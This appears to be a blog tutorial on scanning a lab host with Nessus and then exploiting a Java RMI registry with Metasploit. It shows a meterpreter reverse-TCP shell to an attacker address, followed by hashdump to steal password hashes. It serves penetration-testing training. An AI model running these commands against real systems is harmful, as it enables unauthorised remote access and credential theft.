How to Perform Vulnerability Scan in Nessus : VNC and RMI Registry Vulnerability Exploitations
Step 1:
Go to My
Scans section and click New Scan
Step 2:
Go to User Defined Scan and select our Policy
Refer this article to Create Policy: https://www.admincool.com/2021/03/how-to-create-policy-in-nessus.html
Step 3:
Enter Name
and Description for our first scan
Step 6:
Click
MyScan to see details
Step 7:
Click Vulnerabilities
Tab to see the result
Test VNC Vulnerability identified by Nessus
Enter the password identified by Nessus
Vulnerability: RMI Registry Detection
Scan open ports in Background
──(kali㉿kali)-[~]
└─$ nmap
-sS -sV 192.168.1.221 -p1-65535
Run msfconsole
Search
Exploits of Java_RMI
msf6 >
search java_rmi
msf6 >
use exploit/multi/misc/java_rmi_server
msf6
exploit(multi/misc/java_rmi_server) > show payloads
msf6
exploit(multi/misc/java_rmi_server) > set payload
java/meterpreter/reverse_tcp
msf6
exploit(multi/misc/java_rmi_server) > show options
msf6 exploit(multi/misc/java_rmi_server)
> set RHOST 192.168.1.221
msf6
exploit(multi/misc/java_rmi_server) > set SRVHOST 192.168.65.128
msf6
exploit(multi/misc/java_rmi_server) > set LHOST 192.168.65.128
msf6
exploit(multi/misc/java_rmi_server) > show options
msf6
exploit(multi/misc/java_rmi_server) > exploit
Once the connection is obtained,
# sessions –l
# sessions –i
1
# sysinfo
# hashdump
# run
/post/linux/gather/hashdump
# getuid
No comments: